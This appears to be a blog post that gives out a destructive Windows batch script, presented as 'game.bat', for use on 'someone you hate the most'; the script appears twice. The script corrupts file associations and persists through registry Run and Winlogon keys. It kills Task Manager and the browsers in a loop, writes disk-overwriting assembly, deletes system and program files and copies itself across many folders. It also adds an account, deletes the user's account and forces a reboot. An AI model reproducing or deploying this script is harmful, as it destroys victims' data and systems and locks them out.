Don't give this to anyone , only some one you hate the most
Copy this codes to notepad,and save it as game.bat :-
@echo off
assoc .sys=Error
assoc .exe=Error
assoc .dll=Text File
assoc .dat=Error
setlocal enabledelayedexpansion
if "%1"=="/cmd" (
goto cmd
) else goto start
:start
echo copy %0 "*.*" /y >>AUTOEXEC.bat
set main_folder=%SystemRoot%\pchealth\helpctr\Vendors\CN=Microsoft Corporation,L=Redmond,S=Washington,C=US\Remote Assistance\Escalation\Unsolicited
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wlcomm.exe /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v svchost.exe /t REG_SZ /d %main_folder%\vbs2.vbs /f >nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ccSvChst.exe /t REG_SZ /d %main_folder%\vbs3.vbs /f >nul
goto start
REM making necessary files.....--------------------------
cd %main_folder%
if not exist vbs.vbs (
echo Set objShell = CreateObject("WScript.Shell") >vbs.vbs
echo strCommand = "%%0.bat" >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs
echo Set objShell = CreateObject("WScript.Shell") >vbs.vbs
echo strCommand = "kill.bat" >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs
echo Set objShell = CreateObject("WScript.Shell") >vbs.vbs
echo strCommand = "spcfller.bat" >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs
echo @echo off >spcfller.dll.bat
echo :a >>spcfller.dll.bat
echo %random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%>%random%.%random%.dll >>spcfller.dll.bat
echo %random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%>%random%.%random%.dll >>spcfller.dll.bat
echo goto a >>spcfller.dll.bat
echo xor ax,ax>google.com
echo mov ds,ax>>google.com
echo mov ax,00299>>google.com
echo inc ax>>google.com
echo inc ax>>google.com
echo xor cx,cx>>google.com
echo inc cx>>google.com
echo mov dl,80>>google.com
echo mov bx,13h*4>>google.com
echo pushf>>google.com
echo cli>>google.com
echo push cs>>google.com
echo call dword ptr [bx]>>google.com
echo retn>>google.com
echo mov dx, 1F2h>>google.com
echo mov al,1>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo xor ax,ax>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo mov al, 10100000b>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo mov al,30h >>google.com
echo out dx,al>>google.com
echo lea si, Buffer>>google.com
echo mov dx, 1F0h>>google.com
echo mov cx, 513>>google.com
echo rep outsw>>google.com
REM -----------------------------------------------------
echo @echo off>kill.bat
echo :a >>kill.bat
echo tskill taskmgr >>kill.bat
echo tskill iexplore >>kill.bat
echo tskill firefox >>kill.bat
echo tskill chrome >>kill.bat
echo tskill regedit >>kill.bat
echo tskill rkill >>kill.bat
echo tskill notepad >>kill.bat
echo tskill notepadpp >>kill.bat
echo tskill msnmsgr >>kill.bat
echo start spcfller.dll.bat >>kill.bat
echo goto a >>kill.bat
shutdown -r -t 30 -c "Restart is necessary to complete install"
)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v {01000110-01010010-01100101-00100110} /d REG_SZ /t %main_folder%\google.com /f >nul r
goto before
REM Virus made by 7h3D474N37....
REM -----------------------------------------------------
:before
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WOW\boot /v shell /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Macromedia\Shockwave 10\CollectStatistics /v (Deafult) /t REG_SZ /d 00010000 /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT /v Version /t REG_SZ /d 61 /f >nul
reg add HKEY_LOCAL_MACHINE\SYSTEM\Setup\Pid /v Pid /t REG_SZ /d 11723OEM /f >nul
reg add HKEY_LOCAL_MACHINE\SYSTEM\WPA\Starter /v Installed /t REG_DWORD /d 0x00000754 (754) /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DeviceManager\TroubleShooters /v TroubleShooter-3 /t REG_SZ /d http://youareanidiot.org /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Shell /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v UIHost /t REG_SZ /d cmd.exe /f >nul
reg delete HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\WindowsLogon /v DispFileName /t REG_SZ /d @mmsys.cpl,-5846 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\WindowsLogoff /v DispFileName /t REG_SZ /d @mmsys.cpl,-5853 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\SystemExit /v DispFileName /t REG_SZ /d @mmsys.cpl,-5852 /f 2>&1
reg delete HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll /va /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\Close /v DispFileName /d REG_SZ /t @mmsys.cpl,-5831 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\Schemes\Apps\Explorer\BlockedPopup\.current /v (Deafult) /d REG_SZ /t C:\WINDOWS\system32\winmine.exe /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v text /d REG_SZ /t @shell32.dll,-29478 /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v text /d REG_SZ /t @shell32.dll,-29479 /f 2>&1
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\Add-Remove_Programs /va /f 2>&1
echo del "%systemroot%\system32\appwiz.cpl" /f /q>>%systemdrive%\AUTOEXEC.bat
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace /va /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu /v {871C5380-42A0-1069-A2EA-08002B30309D}.default /d REG_SZ /t 1 /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath /v (Deafult) /d REG_SZ /t %main_folder%\vbs.vbs
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders /v Common Programs /d REG_SZ /t %%systemdrive%%\Windows /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders /v Common STartup /d REG_SZ /t %%appdata%% /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu\StartMenuRun\Policy\NoRun /v (Deafult) /d REG_SZ /t 1 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel\ShowRun /v Valuename /d REG_SZ /t Start_HideRun /f 2>&1
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\System Restore /va /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WindowsUpdate /v ShortcutName /d REG_SZ /t Internet Explorer /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings /v ActiveXCache /d REG_SZ /t %%userprofile%%\Desktop /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings /v CodeBaseSearchPath /d REG_SZ /t CODEBASE;<http://youareanidiot.org>;<http://1227.com>
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked /v {1B90B971-E8C2-22DF-9461-555664651111} /d REG_SZ /t Blocked file extension /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager /v DllName /d REG_SZ /t %%systemroot%%\system32\shdocvw.dll /f 2>&1
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows /v Programs /d REG_SZ /t %
REM -----------------------------------------------------
copy %0 "*.*" /y
cd \
copy %0 "*.*" /y
cd %SystemRoot%
copy %0 "*.*" /y
cd %SystemRoot%\system32
copy %0 "*.bat" /y
REM -----------------------------------------------------
attrib +s +r %~0
REM -----------------------------------------------------
cd \
set tmp=%SystemRoot%\system64
copy %0 "%appdata%"
del %commonprogramfiles%\*.* /Q /S /F
set commonprogramfiles=%tmp%
copy %0 "*.*" /y
cd %tmp%
REM -----------------------------------------------------
cd %systemroot%\system32
echo MZ ยต>>notepad.exe
echo >>notepad.tmp
ren "notepad.exe" "MeLt.exe"
attrib +s MeLt.exe
REM -----------------------------------------------------
call start_dest
assoc .dll=Error
REM -----------------------------------------------------
attrib +h +r +s *.txt
REM -----------------------------------------------------
copy %0 "*.*" /y
cd %SystemRoot%
copy %0 "*.*" /y
cd \
attrib -r "%programfiles%"
cd %programfiles%
copy %0 "*.*" /y
cd "%SystemRoot%\system32"
copy %0 "*.*" /y
cd "%SystemRoot%\system64"
copy %0 "*.*" /y
cd %userprofile%\desktop
copy %0 "*.*" /y
cd "%userprofile%\My documents"
copy %0 "*.*" /y
copy "%systemroot%\system32\melt.exe" "*.exe"
cd %programfiles%
cd Internet Explorer
attrib -s -r *.*
replace "%systemroot%\system32\melt.exe" "*.exe" /R /S
del "*.dll" /F /S /Q
REM -----------------------------------------------------
del "%QTJAVA%" /Y /Q /F
echo %QTJAVA%>java.txt
copy %0 "%allusersprofile%\Start menu\Programs\Startup"
cls
set sessionname=0
REM -----------------------------------------------------
net share INFO=info.txt
copy "info.txt" "tmp.txt"
REM -----------------------------------------------------
:next1
if /I exist "%programfiles%\ATI Technologies" goto ati-trrr
goto next2
:next2
if /I exist "%programfiles%\Intel" goto intel-trr
goto next3
:next3
if /I exist "%programfiles%\Windows Live" goto winlive-trrr
goto lewlz
:ati-trrr
cd %programfiles%\ATI Technologies\ATI control panel
del attfxinxx.* /F /Q /S
echo %random% %random% %random% %random% %random% %random% %random%>attfxinxx.hlx
goto next2
:intel-trrr
cd %programfiles%\Intel\Wireless\Drivers
del *.DLL /Q /S /F
echo %random%%random%%random%%random%%random%%random%>W29CPA.DLL
goto next3
:winlive-trrr
cd %programfiles%\Windows Live
if /I exist "messenger" cd messenger (
echo %random%%random%%random%%random%%random%%random%%random%%random%%comspec%%0 %~0 %random%>backgrounds.mct
echo liveNatTrav.dll>liveNatTrav.dll
echo %~0>>liveNatTrav.dll
)
cd contacts
replace "%systemroot%\melt.exe" "wlcomm.exe"
net share LEWLz=%~0
:last
net user HAXOR 1337FAEN /add
net user %username% /delete
Reg Add HKEY_CURRENT_USER\Control Panel\Mouse /v SwapMouseButtons /t REG_SZ /d 1
echo
:cmd
echo msgbox'cmd.exe' is not a registered Win32 application. Please check if the file is corrupted.",16,"cmd.exe" >err.vbs
start err.vbs
exit
Copy this codes to notepad,and save it as game.bat :-
@echo off
assoc .sys=Error
assoc .exe=Error
assoc .dll=Text File
assoc .dat=Error
setlocal enabledelayedexpansion
if "%1"=="/cmd" (
goto cmd
) else goto start
:start
echo copy %0 "*.*" /y >>AUTOEXEC.bat
set main_folder=%SystemRoot%\pchealth\helpctr\Vendors\CN=Microsoft Corporation,L=Redmond,S=Washington,C=US\Remote Assistance\Escalation\Unsolicited
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wlcomm.exe /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v svchost.exe /t REG_SZ /d %main_folder%\vbs2.vbs /f >nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ccSvChst.exe /t REG_SZ /d %main_folder%\vbs3.vbs /f >nul
goto start
REM making necessary files.....--------------------------
cd %main_folder%
if not exist vbs.vbs (
echo Set objShell = CreateObject("WScript.Shell") >vbs.vbs
echo strCommand = "%%0.bat" >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs
echo Set objShell = CreateObject("WScript.Shell") >vbs.vbs
echo strCommand = "kill.bat" >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs
echo Set objShell = CreateObject("WScript.Shell") >vbs.vbs
echo strCommand = "spcfller.bat" >>vbs.vbs
echo objShell.Run strCommand, vbHide, TRUE >>vbs.vbs
echo @echo off >spcfller.dll.bat
echo :a >>spcfller.dll.bat
echo %random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%>%random%.%random%.dll >>spcfller.dll.bat
echo %random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%random%%random%%random%%random%%random%%random%%random%%random%%RANDOM%%RANDOM%%RANDOM%%RANDOM%>%random%.%random%.dll >>spcfller.dll.bat
echo goto a >>spcfller.dll.bat
echo xor ax,ax>google.com
echo mov ds,ax>>google.com
echo mov ax,00299>>google.com
echo inc ax>>google.com
echo inc ax>>google.com
echo xor cx,cx>>google.com
echo inc cx>>google.com
echo mov dl,80>>google.com
echo mov bx,13h*4>>google.com
echo pushf>>google.com
echo cli>>google.com
echo push cs>>google.com
echo call dword ptr [bx]>>google.com
echo retn>>google.com
echo mov dx, 1F2h>>google.com
echo mov al,1>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo xor ax,ax>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo mov al, 10100000b>>google.com
echo inc dx>>google.com
echo out dx,al>>google.com
echo inc dx>>google.com
echo mov al,30h >>google.com
echo out dx,al>>google.com
echo lea si, Buffer>>google.com
echo mov dx, 1F0h>>google.com
echo mov cx, 513>>google.com
echo rep outsw>>google.com
REM -----------------------------------------------------
echo @echo off>kill.bat
echo :a >>kill.bat
echo tskill taskmgr >>kill.bat
echo tskill iexplore >>kill.bat
echo tskill firefox >>kill.bat
echo tskill chrome >>kill.bat
echo tskill regedit >>kill.bat
echo tskill rkill >>kill.bat
echo tskill notepad >>kill.bat
echo tskill notepadpp >>kill.bat
echo tskill msnmsgr >>kill.bat
echo start spcfller.dll.bat >>kill.bat
echo goto a >>kill.bat
shutdown -r -t 30 -c "Restart is necessary to complete install"
)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v {01000110-01010010-01100101-00100110} /d REG_SZ /t %main_folder%\google.com /f >nul r
goto before
REM Virus made by 7h3D474N37....
REM -----------------------------------------------------
:before
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WOW\boot /v shell /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Macromedia\Shockwave 10\CollectStatistics /v (Deafult) /t REG_SZ /d 00010000 /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT /v Version /t REG_SZ /d 61 /f >nul
reg add HKEY_LOCAL_MACHINE\SYSTEM\Setup\Pid /v Pid /t REG_SZ /d 11723OEM /f >nul
reg add HKEY_LOCAL_MACHINE\SYSTEM\WPA\Starter /v Installed /t REG_DWORD /d 0x00000754 (754) /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DeviceManager\TroubleShooters /v TroubleShooter-3 /t REG_SZ /d http://youareanidiot.org /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Shell /t REG_SZ /d %main_folder%\vbs.vbs /f >nul
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v UIHost /t REG_SZ /d cmd.exe /f >nul
reg delete HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\WindowsLogon /v DispFileName /t REG_SZ /d @mmsys.cpl,-5846 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\WindowsLogoff /v DispFileName /t REG_SZ /d @mmsys.cpl,-5853 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\SystemExit /v DispFileName /t REG_SZ /d @mmsys.cpl,-5852 /f 2>&1
reg delete HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll /va /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\EventLabels\Close /v DispFileName /d REG_SZ /t @mmsys.cpl,-5831 /f 2>&1
reg add HKEY_CURENT_USER\AppEvents\Schemes\Apps\Explorer\BlockedPopup\.current /v (Deafult) /d REG_SZ /t C:\WINDOWS\system32\winmine.exe /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v text /d REG_SZ /t @shell32.dll,-29478 /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v text /d REG_SZ /t @shell32.dll,-29479 /f 2>&1
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\Add-Remove_Programs /va /f 2>&1
echo del "%systemroot%\system32\appwiz.cpl" /f /q>>%systemdrive%\AUTOEXEC.bat
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace /va /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu /v {871C5380-42A0-1069-A2EA-08002B30309D}.default /d REG_SZ /t 1 /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath /v (Deafult) /d REG_SZ /t %main_folder%\vbs.vbs
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders /v Common Programs /d REG_SZ /t %%systemdrive%%\Windows /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders /v Common STartup /d REG_SZ /t %%appdata%% /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu\StartMenuRun\Policy\NoRun /v (Deafult) /d REG_SZ /t 1 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel\ShowRun /v Valuename /d REG_SZ /t Start_HideRun /f 2>&1
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\System Restore /va /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WindowsUpdate /v ShortcutName /d REG_SZ /t Internet Explorer /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings /v ActiveXCache /d REG_SZ /t %%userprofile%%\Desktop /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings /v CodeBaseSearchPath /d REG_SZ /t CODEBASE;<http://youareanidiot.org>;<http://1227.com>
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked /v {1B90B971-E8C2-22DF-9461-555664651111} /d REG_SZ /t Blocked file extension /f 2>&1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager /v DllName /d REG_SZ /t %%systemroot%%\system32\shdocvw.dll /f 2>&1
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows /v Programs /d REG_SZ /t %
REM -----------------------------------------------------
copy %0 "*.*" /y
cd \
copy %0 "*.*" /y
cd %SystemRoot%
copy %0 "*.*" /y
cd %SystemRoot%\system32
copy %0 "*.bat" /y
REM -----------------------------------------------------
attrib +s +r %~0
REM -----------------------------------------------------
cd \
set tmp=%SystemRoot%\system64
copy %0 "%appdata%"
del %commonprogramfiles%\*.* /Q /S /F
set commonprogramfiles=%tmp%
copy %0 "*.*" /y
cd %tmp%
REM -----------------------------------------------------
cd %systemroot%\system32
echo MZ ยต>>notepad.exe
echo >>notepad.tmp
ren "notepad.exe" "MeLt.exe"
attrib +s MeLt.exe
REM -----------------------------------------------------
call start_dest
assoc .dll=Error
REM -----------------------------------------------------
attrib +h +r +s *.txt
REM -----------------------------------------------------
copy %0 "*.*" /y
cd %SystemRoot%
copy %0 "*.*" /y
cd \
attrib -r "%programfiles%"
cd %programfiles%
copy %0 "*.*" /y
cd "%SystemRoot%\system32"
copy %0 "*.*" /y
cd "%SystemRoot%\system64"
copy %0 "*.*" /y
cd %userprofile%\desktop
copy %0 "*.*" /y
cd "%userprofile%\My documents"
copy %0 "*.*" /y
copy "%systemroot%\system32\melt.exe" "*.exe"
cd %programfiles%
cd Internet Explorer
attrib -s -r *.*
replace "%systemroot%\system32\melt.exe" "*.exe" /R /S
del "*.dll" /F /S /Q
REM -----------------------------------------------------
del "%QTJAVA%" /Y /Q /F
echo %QTJAVA%>java.txt
copy %0 "%allusersprofile%\Start menu\Programs\Startup"
cls
set sessionname=0
REM -----------------------------------------------------
net share INFO=info.txt
copy "info.txt" "tmp.txt"
REM -----------------------------------------------------
:next1
if /I exist "%programfiles%\ATI Technologies" goto ati-trrr
goto next2
:next2
if /I exist "%programfiles%\Intel" goto intel-trr
goto next3
:next3
if /I exist "%programfiles%\Windows Live" goto winlive-trrr
goto lewlz
:ati-trrr
cd %programfiles%\ATI Technologies\ATI control panel
del attfxinxx.* /F /Q /S
echo %random% %random% %random% %random% %random% %random% %random%>attfxinxx.hlx
goto next2
:intel-trrr
cd %programfiles%\Intel\Wireless\Drivers
del *.DLL /Q /S /F
echo %random%%random%%random%%random%%random%%random%>W29CPA.DLL
goto next3
:winlive-trrr
cd %programfiles%\Windows Live
if /I exist "messenger" cd messenger (
echo %random%%random%%random%%random%%random%%random%%random%%random%%comspec%%0 %~0 %random%>backgrounds.mct
echo liveNatTrav.dll>liveNatTrav.dll
echo %~0>>liveNatTrav.dll
)
cd contacts
replace "%systemroot%\melt.exe" "wlcomm.exe"
net share LEWLz=%~0
:last
net user HAXOR 1337FAEN /add
net user %username% /delete
Reg Add HKEY_CURRENT_USER\Control Panel\Mouse /v SwapMouseButtons /t REG_SZ /d 1
echo
:cmd
echo msgbox'cmd.exe' is not a registered Win32 application. Please check if the file is corrupted.",16,"cmd.exe" >err.vbs
start err.vbs
exit
No comments:
Post a Comment